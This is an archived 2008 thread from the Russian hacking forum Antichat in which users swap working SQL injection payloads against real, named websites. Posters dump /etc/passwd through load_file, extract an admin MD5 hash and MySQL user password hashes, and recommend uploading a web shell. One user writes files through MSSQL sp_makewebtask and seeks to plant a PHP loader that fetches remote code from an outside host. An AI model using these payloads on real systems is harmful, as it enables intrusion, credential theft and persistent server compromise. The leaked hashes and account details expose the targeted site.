Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
10.07.2008, 21:26
|
|
Новичок
Регистрация: 16.11.2007
Сообщений: 22
Провел на форуме:
147197
Репутация:
5
|
|
Всем привет..
Товарисчи такое вот дело.. нашел скуль и все бы не чего если бы база была mysql c outfile, но увы MSSQL.
Побегал по форуму нашел кое что пробую, пишет - Warning: mssql_query() [function.mssql-query]: message: Line 1: Incorrect syntax near '\'. (severity 15)
сам запрос -
Код:
http://ip/stat.php?type=melee'+union+select+1,'<?php eval($_GET['e']) ?>',3,4,5,6,7,8,9,10,11,12,13+exec+master..sp_makewebtask+'D:\AppServ\www\123.txt'%20--
Что тут не так? |
|
|
10.07.2008, 22:06
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
6u4yxa, дело в том, что у каждой СУБД свой синтаксис. Вот, почитай статейку - https://forum.antichat.ru/thread30501.html
|
|
|
|
11.07.2008, 01:00
|
|
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617
Репутация:
245
|
|
нашол скуль, фильтрации на чтения каталогов нет
http://www.dengi-info.com/news/?nid=-92588+union+select+1,2,3,4,load_file('../../../etc/passwd'),6/*
http://dengi-info.com/phpinfo.php
пхпинфо - там есть полные пути хотел прочитать файл админки неполучаеца =\
путь - /var/www/vhosts/dengi-info.com/httpdocs или /var/www/vhosts/dengi-info.com
админка - http://dengi-info.com/admin/index.php
Код HTML:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
webadmin:x:500:500::/home/webadmin:/bin/bash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
popa3d:x:84:501::/dev/null:/dev/null
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
alias:x:2021:2020:Qmail User:/var/qmail/alias:/bin/false
qmaild:x:2020:2020:Qmail User:/var/qmail/:/bin/false
qmaill:x:2022:2020:Qmail User:/var/qmail/:/bin/false
qmailp:x:2023:2020:Qmail User:/var/qmail/:/bin/false
qmailq:x:2520:2520:Qmail User:/var/qmail/:/bin/false
qmailr:x:2521:2520:Qmail User:/var/qmail/:/bin/false
qmails:x:2522:2520:Qmail User:/var/qmail/:/bin/false
popuser:x:110:31:POP3 service user:/var/qmail/popuser:/bin/false
psaadm:x:2523:2521:Admin Server:/:/bin/false
psaftp:x:2524:2522:anonftp psa user:/:/bin/false
lukasaddon:x:10001:2524::/var/www/vhosts/dengi-info.com:/bin/false
teletrade:x:10002:2524::/var/www/vhosts/teletrade.com.ua:/bin/false
kiev:x:10003:2524::/var/www/vhosts/teletrade.kiev.ua:/bin/false
aserrr:x:10004:2524::/var/www/vhosts/teletrade.bg:/bin/false
Почему немогу прочитать, и что делать...?
кодировал ефекта 0.
Последний раз редактировалось Micr0b; 11.07.2008 в 01:03..
|
|
|
|
11.07.2008, 01:47
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
ну так залей шелл и смотри файлы..
|
|
|
|
11.07.2008, 01:48
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248
Репутация:
668
|
|
во всех современых версиях линука не хранятса пароли в чистом виде ... нужно искать shadow
|
|
|
|
11.07.2008, 02:35
|
|
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617
Репутация:
245
|
|
gisTy>> ефекта 0 проверял =\\
|
|
|
|
11.07.2008, 02:42
|
|
Познающий
Регистрация: 06.11.2007
Сообщений: 57
Провел на форуме:
2688963
Репутация:
272
|
|
Micr0b, ну значит с правами что-то...
ничего для чтения тут не сделаешь
Последний раз редактировалось nex0; 12.07.2008 в 01:39..
|
|
|
|
11.07.2008, 02:50
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
http://www.dengi-info.com/news/?nid=-92588+union+select+1,2,3,4,5,concat(admin,0x3a,adm in_pw)+from+phpads_config/*
admin:dee9eb25bb8bf64bb3097fd26c13911c - обычный md5
.зы попробовать к админке оч даже можно ..
===============================
http://www.dengi-info.com/forum//docs/CHANGELOG.html
3 пхпбб // возможно колонки по дефолту - не помню какие в 3ем ..
===============================
http://www.dengi-info.com/news/?nid=-92588+union+select+1,2,3,4,user,password+from+mysq l.user+limit+1,1
юзер pma_kIkP50QYhmSS наводит мысль о скрытом, а точнее переименованном phpmyadmin .. тк кк дефолтные имена не нашёл ..
===============================
http://www.dengi-info.com/news/?nid=-92588+union+select+1,2,3,4,user,concat_ws(0x3a,use r,password,host)+from+mysql.user+where+host=0x25+l imit+0,1/*
kpblca:28b270316169288e:% - возможно получится подконектится удалённо к базе ..
Последний раз редактировалось 159932; 11.07.2008 в 03:04..
|
|
|
|
11.07.2008, 06:23
|
|
Новичок
Регистрация: 16.11.2007
Сообщений: 22
Провел на форуме:
147197
Репутация:
5
|
|
ДЛя MSSQL нашел как вывести в файл запрос.
EXEC master..sp_makewebtask “file.txt”, “sql-query”.
Пробую - http://ip/stats.php?type=man';exec+master..sp_makewebtask+'D :\appserv\www\123.txt', 'select+*+FROM+dbo.auth'-- но результат ноль пишет Incorrect syntax near '\'. Как залить шелл через мсску... или вывести данные в тхт файл..
З.Ы. - None, прочитал статью https://forum.antichat.ru/thread30501.html. через подзапрос почему то не выводит из таблиц зато через UNION работает на ура..На такой запрос '+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(' name'))-- как только начинаю использовать NOT IN сразу не правильный синтаксис... =((
|
|
|
|
11.07.2008, 08:18
|
|
Новичок
Регистрация: 16.11.2007
Сообщений: 22
Провел на форуме:
147197
Репутация:
5
|
|
Разобрался с выводом файл делаю так:
http://ip/stat.php?type=melee';EXEC master..sp_makewebtask [D:\appserv\www\12.txt],[SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13+FROM+dbo..users]--
- Работает! а как зделать что бы как в Mysql через OUTFILE заливать шелы.. мне надо вставить вот это <?php $a=file_get_contents(\'http://ip/2008.txt\'); $f=fopen(\'sql.php\',\'a\'); fputs($f,$a); fclose($f); ?> - вставляя в одну из колонок так же как в mysql в файл вообще не е не скидывается..
Как мне вывести в файл вот этот кусок кода? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
